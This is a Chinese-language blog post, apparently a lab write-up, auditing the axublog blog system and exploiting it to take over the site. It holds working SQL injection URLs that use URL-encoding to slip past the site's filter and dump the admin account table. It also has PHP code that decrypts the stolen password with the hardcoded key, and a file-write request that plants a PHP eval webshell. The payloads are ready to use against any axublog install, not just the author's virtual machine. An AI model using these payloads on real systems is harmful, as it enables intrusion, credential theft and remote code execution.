对博客系统axublog代码审计到获取webshell

对博客系统axublog代码审计到获取webshell

这是一个博客系统，在虚拟机安装好网站之后，如下所示：

1.从审计到sql注入

对源码进行审计，发现在hit.php文件中，$id和$g都是用户可控的，只要使参数g=arthit，参数id不为空，这里使用get方法接受id的值并带入sql执行语句，没有任何安全措施，更糟糕的是这里存在回显。

使用sql注入攻击，发现存在安全措施：

接着看源码，sqlguolv()函数非常可疑，代码开头使用了require()函数，在class/c_other.php发现了这个函数，这里使用了$_SERVER['QUERY_STRING']获取查询语句，一般是问号后面的字符串，然后使用preg_match()函数来匹配正则表达式。但是有一个问题：

使用$_SERVER['QUERY_STRING']不会对传入的字符进行URL解码操作，

而$_GET时候会进行一次URL解码。所以我们可以使用url编码的方式绕过检测。

u的编码是%75，s是%73。

（1）获取当前数据库

http://192.168.223.134/axublog/hit.php?g=arthit&id=-1%20%75nion%20%73elect%201,2,3,4,5,6,database(),8,9,10,11,12

得到：axublog

（2）获取当前数据库所有表名

http://192.168.223.134/axublog/hit.php?g=arthit&id=-1%20%75nion%20%73elect%201,2,3,4,5,6,group_concat(table_name),8,9,10,11,12%20from%20information_schema.tables%20where%20table_schema=%27axublog%27

得到：axublog_adusers,axublog_arts,axublog_nav_art,axublog_navs

（3）获取axublog_adusers表的字段名

http://192.168.223.134/axublog/hit.php?g=arthit&id=-1%20%75nion%20%73elect%201,2,3,4,5,6,group_concat(column_name),8,9,10,11,12%20from%20information_schema.columns%20where%20table_schema=%27axublog%27%20and%20table_name=%27axublog_adusers%27

得到：id,adnaa,adpss,type

（4）获取axublog_adusers表的数据

http://192.168.223.134/axublog/hit.php?g=arthit&id=-1%20%75nion%20%73elect%201,2,3,4,5,6,group_concat(concat_ws(char(32,58,32),id,adnaa,adpss,type)),8,9,10,11,12%20from%20axublog.axublog_adusers

账号：admin

密码：yYxvHseLMURYWjMU7Y79TDztVWMIdHcv7Xis9PZUnim8oVD0Ig

（5）从审计到解密

跟入authcode方法 在class\c_md5.php文件中的第19-62行中发现了该方法的代码块，把解密的方法取出来，从\ad\login.php的第88行可以知道加解密的字符串的固定的值key，使用如下代码解密：

<?php
function authcode($string, $operation = 'DECODE', $key = '', $expiry = 30) { 
$ckey_length = 0; 
// 随机密钥长度 取值 0-32; 
// 加入随机密钥，可以令密文无任何规律，即便是原文和密钥完全相同，加密结果也会每次不同，增大破解难度。 
// 取值越大，密文变动规律越大，密文变化 = 16 的 $ckey_length 次方 
// 当此值为 0 时，则不产生随机密钥 
$key = md5($key ? $key : EABAX::getAppInf('KEY')); 
$keya = md5(substr($key, 0, 16)); 
$keyb = md5(substr($key, 16, 16)); 
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; 
$cryptkey = $keya.md5($keya.$keyc); 
$key_length = strlen($cryptkey); 
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; 
$string_length = strlen($string); 
$result = ''; 
$box = range(0, 255); 
$rndkey = array(); 
for($i = 0; $i <= 255; $i++) { 
$rndkey[$i] = ord($cryptkey[$i % $key_length]); 
} 
for($j = $i = 0; $i < 256; $i++) { 
$j = ($j + $box[$i] + $rndkey[$i]) % 256; 
$tmp = $box[$i]; 
$box[$i] = $box[$j]; 
$box[$j] = $tmp; 
} 
for($a = $j = $i = 0; $i < $string_length; $i++) { 
$a = ($a + 1) % 256; 
$j = ($j + $box[$a]) % 256; 
$tmp = $box[$a]; 
$box[$a] = $box[$j]; 
$box[$j] = $tmp; 
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); 
} 
if($operation == 'DECODE') { 
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { 
return substr($result, 26); 
} else { 
return ''; 
} 
} else { 
return $keyc.str_replace('=', '', base64_encode($result)); 
} 
} 
# sql注入获取的密文
 $psw='yYxvHseLMURYWjJF7teoG23nUzJVc3wj4338oqgJxS4';
 echo authcode(@$psw, 'DECODE', 'key',0)
 ?>

解密得到：

使用admin，admin123456登录后台：

2.从审计到任意文件上传

在ad/theme.php文件中，$g是通过get方法得到，用户可控，当$g=edit2save时就会调用edit2save()方法。在这个方法中，$path和$content分别表示路径和文件内容，用户可控，最后把这两个参数传入file_put_contents中进行保存操作。

经过上面的分析，我们可以构造如下链接，直接写入webshell：

http://192.168.223.134/axublog/ad/theme.php?g=edit2save&path=../shell.php&content=%3C?php%20@eval($_POST[cmd]);?%3E

成功拿到webshell如下：

这篇文章已经获得webshell，接下来将是提权与内网渗透，未完待续。。。